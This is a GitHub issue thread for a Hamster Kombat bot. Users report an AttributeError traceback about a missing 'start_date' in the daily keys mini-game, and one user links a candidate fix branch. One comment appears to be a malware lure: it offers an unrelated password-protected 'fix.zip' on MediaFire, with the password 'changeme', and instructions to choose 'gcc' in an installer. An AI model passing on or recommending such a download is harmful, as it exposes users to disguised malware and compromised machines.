### ISSUE TITLE
Ошибка в последней обнове

### ISSUE THREAD

**Issue by XPacL** [AnisovAleksey/HamsterKombatBot#51]
Traceback (most recent call last):
  File "C:\Users\User\Desktop\Alena Hamster MiniGames\bot\core\tapper.py", line 232, in run
    await self.check_daily_keys_mini_game(config=config)
  File "C:\Users\User\Desktop\Alena Hamster MiniGames\bot\core\tapper.py", line 329, in check_daily_keys_mini_game
    cipher=get_keys_mini_game_cipher(config, self.profile.id))
           ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "C:\Users\User\Desktop\Alena Hamster MiniGames\bot\core\actions\daily_keys_mini_game.py", line 9, in get_keys_mini_game_cipher
    number = int(datetime.fromisoformat(candles_mini_game.start_date.replace("Z", "+00:00")).timestamp())
                                        ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
AttributeError: 'Config' object has no attribute 'start_date'

**Comment by royalkush** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by groninge01** [comment]
@AnisovAleksey maybe fix like [this](https://github.com/groninge01/HamsterKombatBot/tree/fix/mini-games)?

**Comment by slonce70** [comment]
2024-08-30 22:08:22 | ERROR    | 308 - Deman4 | Unknown error: 'Config' object has no attribute 'start_date'
Traceback (most recent call last):
  File "C:\bots\HamsterCombatBotNew\HamsterKombatBot\bot\core\tapper.py", line 232, in run
    await self.check_daily_keys_mini_game(config=config)
  File "C:\bots\HamsterCombatBotNew\HamsterKombatBot\bot\core\tapper.py", line 329, in check_daily_keys_mini_game
    cipher=get_keys_mini_game_cipher(config, self.profile.id))
  File "C:\bots\HamsterCombatBotNew\HamsterKombatBot\bot\core\actions\daily_keys_mini_game.py", line 9, in get_keys_mini_game_cipher
    number = int(datetime.fromisoformat(candles_mini_game.start_date.replace("Z", "+00:00")).timestamp())
AttributeError: 'Config' object has no attribute 'start_date'
